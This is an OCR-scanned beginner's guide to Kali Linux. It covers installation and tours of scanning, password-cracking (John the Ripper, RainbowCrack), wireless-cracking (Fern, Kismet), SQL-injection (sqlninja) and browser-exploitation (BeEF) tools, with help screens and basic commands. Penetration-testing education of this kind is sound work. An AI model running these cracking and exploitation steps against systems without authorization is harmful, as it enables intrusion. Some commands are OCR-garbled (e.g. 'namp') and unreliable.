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Instant Kali Linux 


Welcome to /nstant Kali Linux. This book is written to provide you with all the 
information that you need to set up and get started with Kali Linux. You will 
learn the basics of Kali, its directory structure, how to work with its popular 
tools, and so on. 


The document contains the following sections: 


So what is Kali Linux? introduces us to Kali, a Linux-based operating system 
specifically designed for penetration testing and computer forensics. It is a 
collection of a few open source software that are used by professionals and 
experts while dealing with real-life pen-testing scenarios. 


Installation helps us to learn how to download and install Kali Linux with 
minimal fuss and how to set up our own pen-testing lab. 


Quick start — getting your tools right shows us how to perform different tasks 
using the different software tools that are available in Kali. We will also cover 
some topics that are essential to start the journey of pen-testing using 

Kali Linux. 


Top 5 features you'll want to know about will help you learn how to perform 
different tasks with the most important features of Kali Linux. By the end 
of this section, you will be able to use Kali's tools to do the following: 

e Scanning and gathering information using Nmap 

e Breaking wireless networks using Aircrack 

e Pen-testing web applications using Burp Suite 

e Getting started with the Metasploit Exploitation Framework 

e Performing automated SOL injection attacks using sqlmap 

e Performing digital forensics using Kali Linux 
People and places you should get to know provides you with many useful links to 
project pages and forums, as well as anumber of helpful articles, tutorials, and 


blogs. It also gives links to the Twitter feeds of Kali Linux super contributors and 
open source hackers. 
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So, what Is Kali Linux? 


Before we get into Kali Linux, we need to understand what penetration testing is. Penetration 
testing or pen-testing is the method of evaluating the security implementations of a computer 
system or a network of computers. The idea behind penetration testing is to target the 
computer(s) with a specific set of attack vectors to figure out whether it is able to withstand 
those attacks without malfunctioning. The different attack vectors in pen-testing can include 
identifying and exploiting the known vulnerabilities in various application software and 
operating systems, assessing the strength of connecting networks, providing assessment 
reports, and so on. Penetration testing has its own field of study within computer science. 


When it comes to penetration testing, Kali Linux is the most preferred operating system for 
professionals. Kali is an advanced Linux-based operating system, a collection of open source 
software that is used to perform different tasks within penetration testing, computer forensics, 
and security audits. Some of its key features include the following: 

+ Kali Linux contains over 300 penetration testing and assessment tools 


+ Kali supports a variety of additional hardware such as wireless receivers 
and PCI hardware 


+ It provides a full-fledged development environment in C, Python, and Ruby 


+ [tis customizable and open source 


Kali comes as a downloadable ISO that can either be used as a live or a standalone operating 
system. Let us move ahead and see how we can set up your penetration testing lab using Kali. 
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Installation 


To begin the installation, we need to download Kali Linux. Kali Linux is available in the 
following formats: 


+ |SO files based on system architecture (x86 and x64) 
+ VMware images 
# ARMimages 


Kali can be either installed as a dual boot with your existing operating system, or it can be 
set up as a virtual machine. Let us begin the process of dual boot installation first. In three 
easy steps, you can install Kali Linux on your system as a dual boot option. 


Step 1 — download and boot 


Before you install Kali, you will need to check whether you have all of the following 
required elements: 


+ Minimum 12 GB of hardware space 
+ Atleast 1GB RAM for optimum performance 
+ Bootable device such as an optical drive or USB 


Once you have checked the requirements, you can download a bootable ISO from its official 
website, http://www. kali.org/downloads. 


You will optionally be asked to register with your name and e-mail. The download page will 
have a few options to select from, such as the window manager and system architecture. 
Choose the values as per your system requirements (architecture and so on). 


KA LA rm UK BLOG DOWNLOADS DOCUMENTATION COMMUNITY ABOUT US 


Downloads 


DOWNLOAD YOUR FLAVOUR OF KALI LINUX... 


Official Kali Mirrors 


OFFENS! 


Kal 10 a . 
INFORMATIK 











hite ctur t i 2 | : 3 wn 
{i386 v | official |v [Gnome v [Iso v [Direct v 


ename: | kaliinux-1.0.34386.iso 


54af51b9f4bf3d77ecd45e548de308837c546012 
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Download Kali 
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Once the download is complete, we will have to burn it to a disk or USB. The disk/USB should be 
made bootable so that the system can load the setup from it. 


Step 2 - setting the dual boot 


Once our bootable media are ready, we are set to restart the system and boot from our disk/USB. 
We will be greeted with a screen similar to the following: 


a 


APACE LEGO 


Boot menu 


Live (686-pae) 

Live (686-pae failsafe) 
Live (forensic mode) 
Install 

Graphical install 
Advanced options 


Press ENTER to boot or TAB to edit a menu entry 





We will begin by selecting the Live boot option. The operating system will start loading and, 
within a few minutes, we will have our first look at the Kali desktop. 


Once the desktop is loaded, navigate to Applications | System Tools | Administration | GParted 
Partition editor. 


This will present a GUI representation of the partition of your current operating system. Carefully 
resize it to leave enough space (12 GB minimum) for the Kali installation. 


Once the partition has been resized on the hard disk, ensure you select the Apply All Operations 
option. Exit GParted and reboot Kali Linux. 
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Step 3 — beginning with the installation 
Once we are back to the home screen, select Graphical install. The initial few screens of the 


installation will ask you for language selection, location selection, keyboard, and so on. We need 
to be careful while setting up the root password. The default root password for Kali is toor. 


Dual boot only 


Once we are through with this, the next important step is selecting 
the partition to install the operating system to. We will have to use the 
same unallocated space that we created moments ago using GParted. 





Once the partition is selected, Kali will take over and install the operating system. The process 
will take some time to complete. After the installation is complete, the system startup screen 

will now give you the option to boot either in Kali Linux or another operating system, which is 
called a (dual boot) configuration. 


Installing Kali as a virtual machine 


Setting up Kali over virtualization software is easy. Kali officially provides a VMware image that 
can be downloaded from its official website (http: //www.kali.org/downloads). It can be 
imported inside a VMware player, when it starts working. 


To set up Kali Linux using Virtual Box, we will need the same ISO file downloaded earlier and a 
recent setup of the virtual box. 


To begin installing, create a new virtual machine and set up the required hard disk space and RAM. 


Name and operating system 


Please choose a descriptive name for the new virtual machine 
and select the type of operating system you intend to install 
onit. The name you choose will be used throughout VirtualBox 
to identify this machine. 





Name: |Kali_linux| 


Type: |Linux +| @ 





Hide Description | < Back Cancel | 
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Once the machine is created, start it. The first start will prompt us to select a disk. Select Kali 
ISO and start the installation. The remaining steps are the same as the dual boot installation. 


Once the installation is complete and desktop is loaded, we can install the VirtualBox guest 
additions. Follow these steps to install the guest additions: 


1. Copy the files to the following location: 


cp /media/cd-rom/VBoxLinuxAdditions.run /root/ 


2. Set the file permission as follows: 
chmod 755 /root/VBoxLinuxAdditions.run 


3. Execute the following command: 
cd /root 


./VBoxLinuxAdditions.run 


Updating Kali Linux 

Once we are through with the installation process, the final step is to update the OS with 
the latest patches and releases. This will ensure that we are working with the latest package. 
To update the operating system, launch the terminal and pass the following command to it: 


apt-get update 


And that's it 


By this point, you should have a working installation of Kali Linux and are free to play around 
and discover more about it. 
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Quick start — getting your tools right 


Let us dive deep into the world of Kali Linux and understand the basic functionalities of some 
of its most popular tools. We will begin by looking at the directory structure used by Kali. 


Understanding the memory layout 


Kali follows a directory structure that is similar to Ubuntu-based Linux. Some of the important 
locations to look for include the following: 


+ /etc/: Contains configuration files of the installed tools 

/opt/: Contains Metasploit and its relevant modules 

/sys/: Contains configuration files of external hardware and interfaces 
/root/: Itis the root user directory 


+++ + 


/1ib/: Contains libraries dependent on the operating system 


File Edit View Go Bookmarks Help 
Devices a opt 
@ VBOXA... 


Computer 


| 
E 


Ea Home 
Desktop 


& File System 
@® Trash i lLost+found 


Network 


fa) Browse Net... 


| 
E 


“i 
@m 
—_ 
a 
Cc 
8 


c 
“i 








“opt’ selected (containing 2 items) 


Most of the tools and software used for penetration testing and assessment can be found from 
the Applications menu on the desktop. The list is logically arranged based on the usability of the 
tools. To access them, browse to Applications | Kali Linux. 


Mm 
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Information gathering and sniffing with Kali Linux 


Kali Linux contains an exclusive set of tools that can help in the process of information gathering. 
Nmap (the network port mapper), DNSmap, and Trace are some important tools included. Let us 
cover some of the tools from specific categories. 


DNSmap analysis 


Domain Name System (DNS) is a hierarchically distributed naming system of servers/resources 
connected to the Internet. The domain names are used to access that particular service. For 
example, www.packtpub.com is used to access the HTTP server hosted by Packt Publishing. 
Let us check out the DNSmap tool provided in Kali. 


DNSmap is a tool that is used to discover all the subdomains associated with a given domain. 
Passing the following command at the terminal will show complete DNS mapping for 


www.rediff.com: 


root@kali:~#dnsmap rediff.com 


root@kali: ~ 


File Edit View Search Terminal Help 
ae 


[~# dnsmap rediff.com 
dnsmap @.30 - DNS Network Mapper by pagvac (qgnucitizen.org) 


[+] searching (sub)domains for rediff.com using built-in wordlist 
[+] using maximum random delay of 10 millisecond(s) between requests 


a.rediftf.com 
1 address #1: 96.1/.187.64 
1 address #2: 96.1/.18?7./ 


.reditf.com 
address #1: ?0?.1=2 


b. rediff.com 
IP address #1: 2027.12 


blogs.rediff.com 
IP address #1: 207.12 


c.reditf.com 
IP address #1: 7O0?.:! 





cataLog.rediff.com 
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Network scanners 


Network scanners are used to enumerate a public or a private network and to gain information 
about it. 


Nmap is by far the most popular information-gathering tool. It is a powerful tool that is used 

to scan a computer or a complete network for open ports along with services running on those 
ports. This information can be useful for professional auditors and pen-testers in order to target 
certain services to compromise the target. Passing the following command will list the various 
scan options available: 


root@kali:~#namp -h 
A simple UDP scan can be launched using the following command: 


root@kali:~#namp -sU 192.168.5.0-255 


Detecting live hosts 
Fping is a popular tool used to identify whether a given host is connected to a network or not. 


root@kali:~#fping google.com 


google.com is live 


SSL analysis 


SSLScan is a fast SSL port scanner that connects to the SSL port, determines which ciphers and 
SSL protocols are supported, and returns the SSL certificate. 


Network sniffing 


Dsniff is a collection of tools that can perform a wide variety of sniffing tasks. These tools work 
by passively monitoring the network traffic for interesting data such as passwords, key transfers, 
and e-mails. Some of the tools in this suite include urlsnarf, WebSpy, mailsnarf, and so on. 


Netsniff is a fast and robust networking toolkit specifically designed for Linux platforms. It can 
be used for network development analysis, debugging, auditing, and so on. netsniff-ng is a fast 
network analyzer based on packet mmap(2) mechanisms. It can record . pcap files to a disc, 
replay them, and also perform an offline and online analysis. 
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Working with vulnerability assessment tools 


Vulnerability assessment tools play a very important role in penetration testing. These tools 

help a pen-tester in analyzing vulnerabilities and weaknesses in the current system. Vulnerability 
assessment can be performed over a variety of services and software based on the requirement. 
OpenVAS is an open source vulnerability-scanning framework specifically designed to dig out 
vulnerabilities under various scenarios. 


To start working with OpenVAS, browse to Applications | Kali Linux | Vulnerability Analysis | 
OpenVAS. 


If you are starting it for the first time, run openvas- setup to update the software and start 
all of the required plugins and dependencies. 


Terminal 


File Edit View Search Terminal Help 

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'. 
[i] The ‘'OpenVAS NVT Feed' is provided by ‘The OpenVAS Project’. 

[i] Online information about this feed: ‘http://www.openvas.org/openvas-nvt -Tfeed 
tml’. 

i] NVT dir: /var/lib/openvas/plugins 

i] Will use rsyne 

i] Using rsync: /usr/bin/rsyne 

i] Configured NVT rsync feed: rsync://Teed.openvas.org:/nvt-feed 

OpenVAS feed server - http://openvas.org/ 

This service is hosted by Intevation GmbH - http://intevation.de/ 

ALL transactions are Logged. 

Please report problems to admin@intevation.de 


receiving incremental Tile List 


COPYING 


588 100% 574.22kB/s (xfer#l, to-check=60746/60800) 
COPYING .GPLv2 
18002 160%  17.17MB/s DO (xfer#2, to-check=60/45/60800) 
COPYING. files 
1215888 100% 684.38kB/s (xfer#3, to-check=60744/60800) 
DDI Directory Scanner.nasl 
37974 100% 48 .5/kB/s (xfer#4, to-check=60715/60800) 
DDI Directory Scanner.nasl.asc 





The next step will be to add a new user to OpenVAS. Pass on the following command to 
the terminal: 


root@kali: ~#openvas-adduser 


You can skip the rule creation process by pressing Ctrl + D. We can use the following command 
to regularly update the framework with new signatures and dependencies: 


root@kali:~#openvas-nvt-sync 


a 
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Now, we are all set to load the framework and begin our assessment task. Browse to Applications 
| Kali Linux | Vulnerability Analysis | OpenVAS | openvas-gsd. This will launch the GUI framework 
and prompt for the login details. Enter the credentials that you set up earlier and provide the local 

server address. 


File Task View Settings Extras Help 


Dachhnaara 


Log in 
Profile 


‘default | se / 
Plesse enter address and , . 


user aocount for your scan | Save | Delete 


engre. , . 








lf you select one of the 
s hieec weal ace Ga Serveraddress Port 


enter the password. 


Before you press the login '127.0.0.1 | 19390 | & OMP 3.0 


button you may store the 
aocess profile. 
Username 
Note, that the scan endgnme 
must have OPP support 
enabled for the gven port ‘root 


for 4s successful conmection. 


| Password 


eR 





Perfor... 


Refresh Interval: manual 
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After logging in, you can begin your scanning process. To get started with your first scan, 
navigate to Task | New. Fill in a task name and the required scan mode as shown in the 
following screenshot: 


New Task 


Mame een 


Comment (optional) | 


scan Contig Full and fast 
Scan Targets Localhost 
Escalator (optional) 

Schedule (optional) 


Slave (optional) 


Cancel Create 





Once the task is created, you will notice that the task is listed at the bottom part of the interface. 
Click on the Start button to begin scanning. 


Web app penetration testing in Kali 


Web apps are now a major part of today's World Wide Web. Keeping them safe and secure is the 
prime focus of webmasters. Building web apps from scratch can be a tedious task, and there can 
be small bugs in the code that can lead to a security breach. This is where web apps jump in and 
help you secure your application. Web app penetration testing can be implemented at various 
fronts such as the frontend interface, database, and web server. Let us leverage the power of 
some of the important tools of Kali that can be helpful during web app penetration testing. 
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WebScarab proxy 


WebScarab is an HTTP and HTTPS proxy interceptor framework that allows the user to review 
and modify the requests created by the browser before they are sent to the server. Similarly, 

the responses received from the server can be modified before they are reflected in the browser. 
The new version of WebScarab has many more advanced features such as XSS/CSRF detection, 
Session ID analysis, and Fuzzing. Follow these three steps to get started with WebScarab: 


1. 





To launch WebScarab, browse to Applications | Kali Linux | Web applications | Web 
application proxies | WebScarab. 


Once the application is loaded, you will have to change your browser's network 
settings. Set the proxy settings for IP as 127.0.0.1 and Port as 8008: 


Connection Settings 


Configure Proxies to Access the Internet 
“ No proxy 
( Auto-detect proxy settings for this network 
() Use system proxy settings 


‘@) Manual proxy configuration: 


HTTP Proxy: | 127.0.0.1 | Port: | 
|_| Use this proxy server for all protocols 
SSL Proxy: | | Port: | 


FTP Proxy: | | Port: | 


SOCKS Host: | | Port: | 


OSOCKS v4 @ SOCKS v5 
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3. Save the settings and go back to the WebScarab GUI. Click on the Proxy tab and check 
Intercept requests. Make sure that both GET and POST requests are highlighted on 
the left-hand side panel. To intercept the response, check Intercept responses to begin 
reviewing the responses coming from the server. 


WebScarab 


File View Tools Help 
i Scripted | Fragments | Fuzzer | Compare | Search | SAML | OpenID | WS-Federation | Identity 
’ Summary | Messages | Proxy | Manual Request | Spider | Extensions | XSS/CRLF | SessionID Analysis 


‘Listeners | Manual Edit | Bean Shell | Miscellaneous 


Intercept requests : Case Sensitive Regular Expressions ? [_| 


Methods «| Include Paths matching: 
GET es 


POST Exclude paths matching: 
css|jsjico|swtlaxd. *) $ 


HEAD 
PUT 
DELETE 
TRACE 
PROPFIND 
OPTIONS 
PROPPATCH 
MECOL 
COPY 
MOVE 
LOCK 


Intercept responses: 


Only MIME-Types matching: 
ltent/, * | 





Attacking the database using sqlninja 


sqininja is a popular tool used to test SOL injection vulnerabilities in Microsoft SOL 
servers. Databases are an integral part of web apps hence, even a single flaw in it can 
lead to mass compromising of information. Let us see how sqlninja can be used for 
database penetration testing. 


To launch SOL ninja, browse to Applications | Kali Linux | Web applications | Database 
Exploitation | sqlninja. 
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This will launch the terminal window with sqlninja parameters. The important parameter 
to look for is either the mode parameter or the -m parameter: 


root@kali: ~ 


File Edit View Search Terminal Help 
Sqlninja rel. @.2.6-rl1 
Copyright (C) 2006-2011 icesurfer <r06t@northernfortress.net= 
Usage: /usr/bin/sqlninja 
-m <mode> : Required. Available modes are: 
/test - test whether the injection is working 
f/fingerprint - fingerprint user, xp_cmdshell and more 
o/bruteforce - bruteforce sa account 
efescalation - add user to sysadmin server role 
x/resurrectxp - try to recreate xp_cmdshell 
fupload - upload a .scr file 
/dirshell - start a direct shell 
/backscan - Look for an open outbound port 
frevshell - start a reverse shell 
d/dnstunnel - attempt a dns tunneled shell 
Lficmpshell - start a reverse ICMP shell 
c/sqlemd - issue a ‘blind’ O05 command 
/metasploit - wrapper to Metasploit stagers 
F <file> : configuration file (default: sgqlninja.conf) 
<password> : sa password 
<wordlist=> : wordlist to use in bruteforce mode (dictionary method 
only) 
generate debug script and exit (only valid in upload mode) 
verbose output 
<mode> : activate debug 





The -m parameter specifies the type of operation we want to perform over the target database. 
Let us pass a basic command and analyze the output: 


root@kali:~#sqlninja -m test 
Sqlninja rel. 0.2.3-r1 
Copyright (C) 2006-2008 icesurfer 


[-] sqlninja.conf does not exist. You want to create it now ? [y/n] 


This will prompt you to set up your configuration file (sqlninja.conf). You can pass the 
respective values and create the config file. Once you are through with it, you are ready to 
perform database penetration testing. 


The Websploit framework 


Websploit is an open source framework designed for vulnerability analysis and penetration 
testing of web applications. It is very much similar to Metasploit and incorporates many of 
its plugins to add functionalities. 
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To launch Websploit, browse to Applications | Kali Linux | Web Applications | Web Application 
Fuzzers | Websploit. 


Terminal 


File Edit View Search Terminal Help 


--=[WebSpLloit Framework 
+---**---==[Version : 
+---**_--==[Codename : 
+---**---==/Ayailable Modules : 

--=[Update Date : [ 





We can begin by updating the framework. Passing the update command at the terminal will 
begin the updating process as follows: 


wsf>update 


[*]Updating Websploit framework, Please Wait... 


Once the update is over, you can check out the available modules by passing the following 
command: 


wsf>show modules 
Let us launch a simple directory scanner module against www. target .comas follows: 


wsf>use web/dir scanner 
wsf:Dir Scanner>show options 
wsf:Dir Scanner>set TARGET www.target.com 


wsf:Dir Scanner>run 
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root@kali: ~ 


File Edit View Search Terminal Help 
Metasploit Autopwn Service 
Metasploit Browser Autopwn Service 
Java Applet Attack (Using HTML) 


Description 


wifi/wifi jammer Wifi Jammer 
wifi/wifi dos Wifi Dos Attack 


wWSTt > use web/dir_ scanner 


wsf:Dir Scanner > show options 


Options Value 


r = set TARGET www.target.com 
www.target.com 
scanner = run 


Loading Path List 


i iat | F =i | f 
_ es @ u = 





Once the run command is executed, Websploit will launch the attack module and display the 
result. Similarly, we can use other modules based on the requirements of our scenarios. 


Breaking passwords 


Passwords are the most common authentication technique implemented in computer systems. 
Breaking them can provide a direct entry into the system and can give you the desired privilege 
escalation. Kali comes with several tools that can be used to break passwords either offline 

or online. Let us look over some of the important password-cracking tools in Kali and discuss 
their mode of operations. 


John the Ripper 


John the Ripper is a free and fast password cracker that can be effectively used to break weak 
Unix passwords, Windows LM Hashes, DES, Kerberos, and many more cryptic methodologies. 


Cracking passwords with John can be done by the Brute Force technique wherein the encrypted 
password can be provided inside a file. Alternatively, we can also provide a wordlist of passwords 
against which we can apply the Brute Force technique to match the password. 


To launch John the Ripper, browse to Applications | Kali Linux | Password Attacks | Offline 
Attacks | John. 


__ 
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root@kali: ~ 


File Edit View Search Terminal Help 

John the Ripper password cracker, ver: 1./.9-jumbo-/ [Linux-x86-sse2] 
Copyright (c) 1996-2012 by Solar Designer and others 

Homepage: http://www.openwall.com/john/ 


Usage: john [OPTIONS] [PASSWORD-FILES] 

--config=FILE use FILE instead of john.conf or john.ini 

--SingLe[=SECTION] "Single crack" mode 

--wordlList[=FILE] --stdin wordlist mode, read words from FILE or stdin 
--pipe like --stdin, but bulk reads, and allows rules 

--Loopback[=FILE] Like --wordList, but fetch words from a .pot file 

--dupeé-suppression suppress all dupes in wordlist (and force preload) 

- -encoding=NAME input data is non-ascii (eg. UTF-8, I[S50-8859-1). 

For a Tull List of NAME use --List=encodings 

--rulLes[=SECTION] dlist modes 

--incremental [ =MODE] "incremental" mode [using section MODE] 

--markov[=OPTIONS] "Markov" mode {see doc/MARKOV) 

--external=MODE external mode or word filter 

--stdout [=LENGTH] just output candidate passwords [cut at LENGTH] 

--restore[ =NAME] restore an interrupted session [called NAME] 

--session=NAME give a new session the NAME 

--status[=NAME] print status of a session [called NAME] 

--make-charset=FILE make a charset Tile. It will be overwritten 

- -show[ =LEFT] show cracked passwords [if =LEFT, then uncracked] 

--test[=TIME] run tests and benchmarks for TIME seconds each 





To launch a brute force attack against a password file, you can pass the following command: 
root@kali:~#john pwd 

Here pwd is the name of the password file. 

To retrieve the cracked password, pass the following command: 

root@kali:~#john -show pwd 

You can also provide a wordlist of stored passwords: 


root@kali:~#john --wordlist=password.lst --rules pwd 


Working with RainbowCrack 


RainbowCrack is a faster password cracking tool than John. RainbowCrack is based on the 
concept of using rainbow tables, a huge collection of pregenerated hashes of nearly every 
possible password. The user input hash is given as the input for RainbowCrack, and it matches 
the hashes of the rainbow table unless a match is found. This technique is proven to be more 
effective and less time-consuming than brute force. 
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To launch RainbowCrack, browse to Applications | Kali Linux | Password Attacks | Offline 
Attacks | RainbowCrack. 


root@kali: ~ 


File Edit View Search Terminal Help 

RainbowCrack 1.5 

Copyright 2003-2010 RainbowCrack Project. ALL rights reserved. 
Official Website: http://project-rainbowcrack.com/ 


usage: rerack rt_files [rt_files ] -h hash 

rcrack rt_files [rt files ...] -l hash list file 

rcerack rt_files [rt_files ] -f pwdump file 

rerack rt_files [rt files ...] -n pwdump file 
rt_files: path to the rainbow table(s), wildchar(*, ?) supported 
-h hash: Load single hash 


-L hash list file: load hashes from a file, each hash in a line 
-f pwdump file: Load Lanmanager hashes from pwdump file 
-n pwdump file: Load ntlLm hashes from pwdump file 


hash algorithms implemented in algLlib@.so: 
Lm, plaintext _len Limit: 6 - 7 
ntlm, plaintext len limit: @ - 15 
md5, plaintext len Limit: @ - 15 
shal, plaintext_len limit: @ - 20 
mysqlshal, plaintext Len Limit: 0 20 
halflmchall, plaintext len Limit: @ - 7 
ntlmchall, plaintext _len Limit: @ 15 
oracle-SYSTEM, plaintex ‘t_len limit: Q@ - 16 
md5-half, plaintext _Len Limit: @ - 15 





An example command is as follows: 


rerack *.rt -l hash.txt 


This command launches RainbowCrack and looks for the rainbow table with the wildcard search 
(*); the hash to be cracked is picked from the hash. txt file. 


Targeting wireless networks 


Wireless network is one of the primary means of connecting computers in a network. This creates 
a wide scope for security testing in this domain. Penetration testing we perform on a wireless 
network is similar to wired networks. The only difference lies in the way in which devices and 
protocols are connected. Kali comes with many useful tools that can ease the process of testing 
and assessment of wireless networks. Let us have a quick look at some of them. 


Working with Kismet 


Kismet is a wireless network detector/sniffer that can be used to trace the data flowing 

over the wireless communication medium. Kismet identifies networks by passively collecting 
packets and detecting networks, which allows it to detect hidden networks and the presence 
of non-beaconing networks via data traffic. 
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Kismet can be launched from Applications | Kali Linux | Wireless Attacks | Wireless tools | 
Kismet. 


root@kali: ~ 


File Edit View Search Terminal Help 


Usage: /usr/bin/kismet_server [OPTION] 

Nearly all of these options are run-time overrides for values in the 
kismet .conf configuration file. Permanent changes should be made to 
the configuration file. 

*** Generic Options *** 

-v, --version Show version 

-f, --config-file <file> Use alternate configuration file 
--no-Line-wrap Turn of Linewrapping of output 

(for grep, speed, etc) 

-S, --Silent Turn off stdout output after Setup phase 
- -daemonize Spawn detatched in the background 
--no-plugins Do not load plugins 
--no-root Do not start the kismet capture binary 


when not running as root. For no-priv 
remote capture ONLY. 


*** Kismet Client/Server Options *** 
-l, --server-Listen Override Kismet server Listen options 


*** Kismet Remote Drone Options *** 
--drone-Listen Override Kismet drone Listen options 


*** Dump/Logging Options *** 





Once the terminal is loaded, type kismet and press Enter. You will be greeted with an introductory 
screen. Answer the questions to launch the server. If you are running it for the first time, it will ask 
you to select an interface. 


root@kali: ~ 


File Edit View Search Terminal Help 


Kismet Sort View Windows 
Kismet 


Not 
Connected 


Some terminals don't display some colors (notably, dark grey) 
correctly. The next line of text should read ‘Dark grey text': 


Is it visible? If you answer 'No', dark grey 

will not be used in the default color scheme. Remember, you 
can always change colors to your taste by going to 

Kismet ->Preferences->Colors. 


[ No ] [ Yes ] 


(Connection refused) will attempt to reconnect in 5 seconds. 
ERROREMMOCI0] Me alo) ai ole/ala-Toh aii toll GA) (-)a-1-1 0-1 a Me lot-] Male] —5 20108 

(Connection refused) will attempt to reconnect in 5 seconds. 
alg: Could not connect to Kismet server ‘localhost :2501' 

(Connection refused) will attempt to reconnect in 5 second 
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Add your wireless interface (wlano by default) and select Add as shown in the following 
screenshot:. 


root@kali: ~ 


File Edit View Search Terminal Help 


Indexing manufacturer db 
: Completed indexing manufacturer db, 21650 Lines 433 indexes 
Creating network tracker... 
.: Reading config file ‘'/root/.kismet 
: Reading config file '/root/.kismet 
0: Creating chanfK—Add Source————— 
: Registering d 
O: Pcap log in P 
INFO: Kismet starti 
INFO: No packet sou he Kismet 
client, or by 
(/etc/kismet. 
ERROR: Could not co » seconds 
INFO: Kismet server 
ERROR: Could not co: Ci=1-Tene] ale [= 
ERROR: Could not connec e GPSD server, | ale Pt » Seconds 
min in\O|p Oa Ole]0) Ge Ma lehammelelalal-lene GPSD server, | E one a 40 1 Tole] ale |= 
ERROR: Could not c fy ee ot GPSD server, | E Biter 25 seconds 
ERROR: Could not c se oe GPSD server, | t . ct in 30 seconds 
ERROR: Could not c og 8 server, | Cc one a 10 —1-Tele] ale [= 





Once the interface is added, Kismet will start reporting reachable wireless networks. You can 
select any of them to begin capturing the data flowing over it. 


root@kali: ~ 


File Edit View Search Terminal Tabs Help 


 root@kali: ~ root@kali: ~ 
Kismet 200 


Elapsed 


00:03.53 


Networks 
o|= 


é£/ 


Packets 


1963 


Pkt/Sec 


= 


Filtered 


() 


6:61:D5, encryption yes, channel 11, 54.00 mbit 

INFO: '-, BSel) 5C:CE*6B711:51-536 
encryption yes, 1, 54.00 mbit 

gig: Could not connect to the GPSD server, will reconnect 


SiC me—1-lere) ale (> 
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This was a quick tutorial on how Kismet can be used to identify wireless networks and passively 
sniff the data over them. 


Fern WIFI Cracker 


Fern is a Wi-Fi auditing GUI-based tool that is able to crack and recover WEP/WPA/WPS keys and 
also run other network-based attacks on wireless or Ethernet-based networks. This tool has been 
developed using the python language. To use Fern, you should have some preinstalled tools such 
as Aircrack, Python Scrapy, and Reaver. Kali has these tools preinstalled, so you need not worry 
about installing them. Some of the important features of Fern include: 


+ 


+++ + 


+ 


WEP Cracking with Fragmentation, Chop-Chop, Caffe-Latte, Hirte, ARP Request 
Replay, or WPS attack 


WPA/WPA2 Cracking with dictionary or WPS-based attacks 
Automatic saving of the key in the database upon a successful crack 
Automatic access point attack system 

Session hijacking (passive and Ethernet modes) 


Access point MAC address for geolocation tracking 


To launch fern, browse to Applications | Kali Linux | Wireless Attacks | Wireless tools | Fern 
WIFI Cracker. 
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Once the GUI is loaded, select your interface from the drop-down menu. After a few moments, 
the GUI will start reflecting nearby Wi-Fi networks categorized on their password security 
(WPA, WEP, and so on). 


= Key Database 





Once the scan setting pop up appears, click on OK to proceed. After few moments, the attack 
will be launched and any successful crack will be reported by Fern. 


Bluetooth auditing 


Kali also provides an option to audit Bluetooth network mode. Bluetooth is the most commonly 
used way of data transfer in mobile networks and in almost all modern day devices that support 
Bluetooth. Hence, auditing Bluetooth can be crucial for network administrators. We will give a 
brief introduction to BlueRanger. 


BlueRanger 


BlueRanger is a simple Bash script that uses link quality to locate Bluetooth radio devices. 
It sends L2CAP (Bluetooth) pings to create a connection between Bluetooth interfaces since 
most devices allow pings without any authentication or authorization. 
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To begin working with BlueRanger, browse to Applications | Kali Linux | Wireless Attacks | 
Bluetooth tools | Blueranger. 


root@kali: ~ 


File Edit View Search Terminal Help 


BlueRanger 1.8 by JP Dunning [(.renin) 
<www .hackT romacave.com> 
(c) 2009-2012 Shadow Cave LLC. 


NAME 
blueranger 


SYNOPSIS 

blueranger.sh <hceix> <bdaddr= 
DESCRIPTION 

<hclk> Local interface 


<bdaddr>= Remote Device Address 


= mt 





To launch the enumeration of Bluetooth network PAS on the command at the terminal as shown 
inthe SYNOPSIS of the preceding image. An example command can be: 


root@kali:~#blueranger.sh hci0 6C:D4:8A:B0:20:AC 


Once the command is executed, the Bash script will start pinging the devices that are in range. 
The screen will refresh after each ping. It will report the nearby devices, ping count, proximity 
change, range, and so on. 


Exploitation frameworks and tools 


Exploitation frames are the heart and soul of penetration testers. It gives them the power 
to manage their assessment easily using a single framework. Kali Linux integrates these 
frameworks right into its core to make sure they perform in the most optimal way. In this 
section, we will cover some of the important exploitation frameworks present in Kali Linux. 


Browser Exploitation Framework 


Browser Exploitation Framework (BeEF) is a popular open source framework that is 
particularly designed for auditing web browsers. Launch BeEF via Applications | Kali Linux | 
Exploitation Tools | BeEF Exploitation Framework | BeEF. This will launch the browser with 
the following location: 


Het?) /127.0.0<123000/u1,/ panel, 


a 
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In the next step, you will be asked for authentication. The default username and password is 
beef and beef respectively. 


Initial versions of Kali do not have BeEF installed. In that case, use the following commands to 
get the latest copy of BeEF: 


root@kali:/# apt-get update 
root@kali:/# apt-get install beef-xss 


Once the install is finished, we can change to its directory and launch BeEF using the following 
commands: 


root@kali:/# cd /usr/share/beef-xss 
root@kali:/# ./beef 


Once the welcome page is loaded, you can start by clicking on the demo link to get official 
get-started tutorials. 


BeEF Control Panel - Iceweasel 
File Edit View History Bookmarks Tools Help 
@ BeEF Control Panel | Si | 


@ | @ 127.0.0.1:3001 el v @| (By 


fjMost VisitedyY [{§Offensive Security “4 Kali Linux “Kali Docs [JExploit-DB W&Aircrack-ng 











@ BeEF 0.44.Lalpha | Submit Bug | Logout 
Hooked Browsers Getting Started 
(Online Browsers — 
4 J Offline Browsers 
4497001 


@AS8w7001 


-eEF 


THE BROWSER EXPLOITATION FRAMEWORK PROJECT 


Official website: http://beefproject.com/ 
Getting Started 


Welcome to BeEF! 


Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you 
can point a browser towards the basic demo page here, or the advanced version here. 


After a browser is hooked into the framework they will appear in the 'Hooked Browsers’ panel on the 
left. Hooked browsers will appear in either an online or offline state, depending on how recently they 
have polled the framework. 


Hooked Browsers 


To interact with a hooked browser simply left-click it, anew tab will appear. Each hooked browser tab 
has anumber of sub-tabs, described below: 


Main: Display information about the hooked browser after you've run some command modules. 
Logs: Displays recent log entries related to this particular hooked browser. 
Cammande: Thic tah ic where mociiles can he everci tect anainet the honkedd hroweer Thic ic 





The left panel of BeEF will reflect the browsers in which the plugin is hooked and ready. You will 
notice different tabs at the top. Let us take a quick look at them. 


+ Getting Started: It's the same welcome page that we just read in the 
preceding paragraphs. 


+ Logs: It shows the different browsers’ actions. 
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+ Current Browser: This is the main tab to look for. It contains details about 
the current working browser. It contains six different subtabs with additional 
information and actions. 





@ | @ 127.0.0.1:30 , v @| |v a) 








fj Most Visitedy [{§Offensive Security “a Kali Linux “& Kali Docs ERExploit-DB ® Aircrack-ng 


dl BeEF 0.4.4.1-alpha | Submit Bug | Logout 
Hooked Browsers 
